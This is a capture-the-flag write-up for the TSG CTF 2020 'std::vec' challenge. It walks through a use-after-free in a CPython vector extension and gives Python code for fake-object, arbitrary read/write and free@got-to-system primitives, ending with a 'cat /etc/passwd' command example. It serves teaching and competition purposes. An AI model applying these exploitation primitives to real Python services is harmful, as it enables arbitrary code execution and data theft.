Tags: cpython pwn ctf python
Rating: 3.5
In TSG CTF 2020 I got first blood on a challenge called std::vec
. It was quite simple but the overall 'feel' of the challenge was very neat. Shout out to moratorium08, the author of this challenge!
The vulnerability is easy to spot, as it is already introduced in other challenges. A very similar bug exists in this challenge from facebook ctf 2019. Basically, it occurs because the private fields of a std::vector
is copied to another structure. When a std::vector
is expanded, the original backing memory is freed. Therefore, the private fields copied to another location becomes a dangling pointer. Reading/writing from that pointer triggers uaf.
victim = stdvec.StdVec()
for i in range(0x100):
victim.append(0)
victim_iter = iter(victim)
# deallocate the back of iter1
for i in range(0x1000):
victim.append(0)
obj = next(victim_iter)
In this POC, victim_iter
is a variable that contains the freed pointers. In the first loop, the victim vector is expanded to accomodate 0x100 entries, which is equivalent to 0x800 bytes since each entry is a PyObject *
and sizeof(PyObject *) = 8
. Afterwards the iterator is extracted from the vector.
In the second loop, the vector is expanded to 0x8000 bytes and the original backing memory is freed. Therefore the pointers in victim_iter
become dangling pointers. In the last line, 8 byte read from freed memory occurs. This causes a crash.
The following code causes a crash at a specific address.
victim = stdvec.StdVec()
for i in range(0x100):
victim.append(0)
victim_iter = iter(victim)
# deallocate the back of iter1
for i in range(0x1000):
victim.append(0)
reclaim = bytearray(0x800)
reclaim[0:8] = p64_bytearray(0xdeadbeef)
obj = next(victim_iter)
This causes a crash because the reclaim
bytearray reclaims the 0x800 bytes used in victim_iter
. The first 8 bytes of the reclaimed memory becomes 0xdeadbeef, so next(victim_iter)
returns (PyObject *)0xdeadbeef. However when returning a PyObject
it increments the refcount by 1, and this write access causes a crash.
Now we can construct the fakeobj
primitive based on this POC.
def fakeobj(address):
victim = stdvec.StdVec()
for i in range(0x100):
victim.append(0)
victim_iter = iter(victim)
# deallocate the back of iter1
for i in range(0x1000):
victim.append(0)
reclaim = bytearray(0x800)
reclaim[0:8] = p64_bytearray(address)
obj = next(victim_iter)
return obj
Basically the fakeobj
function converts an address into a python object. If the contents in that address is well controlled we can forge an arbitrarty python object which is an extremely powerful primitive.
A way to put controlled data at a known address is to use python bytes
. In bytes
the content is inlined in the structure at offset 0x20. This can be seen in the following definition. (Although I figured this out intuitively by looking at gdb during the ctf)
typedef struct {
PyObject_VAR_HEAD
Py_hash_t ob_shash;
char ob_sval[1];
/* Invariants:
* ob_sval contains space for 'ob_size+1' elements.
* ob_sval[ob_size] == 0.
* ob_shash is the hash of the string or -1 if not computed yet.
*/
} PyBytesObject;
Therefore, by providing id(bytes_object) + 0x20
to fakeobj
we can forge an arbitrary python object.
To get arbitrary write, we forge a bytearray object with a user controlled backing vector pointer. The structure of a bytearray is the following.
struct PyByteArrayObject {
int64_t ob_refcnt; /* can be basically any value we want */
struct _typeobject *ob_type; /* points to the bytearray type object */
int64_t ob_size; /* Number of items in variable part */
int64_t ob_alloc; /* How many bytes allocated in ob_bytes */
char *ob_bytes; /* Physical backing buffer */
char *ob_start; /* Logical start inside ob_bytes */
int32_t ob_exports; /* Not exactly sure what this does, we can ignore it */
}
By controlling ob_bytes
and ob_start
we can read/write at arbitrary addresses. The following code implements the foring of a bytearray.
string = p64(0xff)+p64(id(type(bytearray(0))+p64(0x100)+p64(0x100)+p64(someaddr)*2
faked = fakeobj(id(string) + 0x20)
Also, since we want to obtain arbitrary read/writes multiple times, we use the following strategy. We first create a slave bytearray. Then, we forge a master bytearray using fakeobj
. The master bytearray's ob_bytes
points to the address of slave, so writing to master alters the structure of slave. Therefore we can set the write address by writing at offset 0x20 of master, and writing to slave afterwards. The following code implements this.
def arbitrary_write(address, value):
master[0x20:0x28] = p64_bytearray(address)
master[0x28:0x30] = p64_bytearray(address)
slave[0:0x8] = p64_bytearray(value)
Now we can write an exploit by glueing all of the primitives above. However, there are a few issues to resolve.
First, we can't use the functions iter
and next
because all builtins are removed. Therefore, we replace the code with the following code.
counter = 0
for x in victim:
# this frees the back of the current iterator
for j in range(0x1000):
victim.append(0)
reclaim = bytearray(0x800)
reclaim[0x8:0x10] = p64_bytearray(address)
if counter == 1:
return x
counter += 1
Basically it is an implementation that doesn't use iter
and next
and uses the internals of forloops.
Second, we can't use the type
function for the same reason in 1. However, since there is no PIE in the python binary and the type object is located in the data section of the binary, the type
object is always located at the same address. Therefore we can print the id of type(bytearray(0)
locally and use it for the exploit. I found it was 10595392.
Lastly, we need to find a function pointer to overwrite. I used free@got
for this. To free something whose contents we can control, I hand-fuzzed various methods and figured out that printing a string frees it. So, print("cat /etc/passwd")
triggers system("cat /etc/passwd")
if we overwrite free@got
with system
.
This is my final exploit. I hope it is a good reference for others.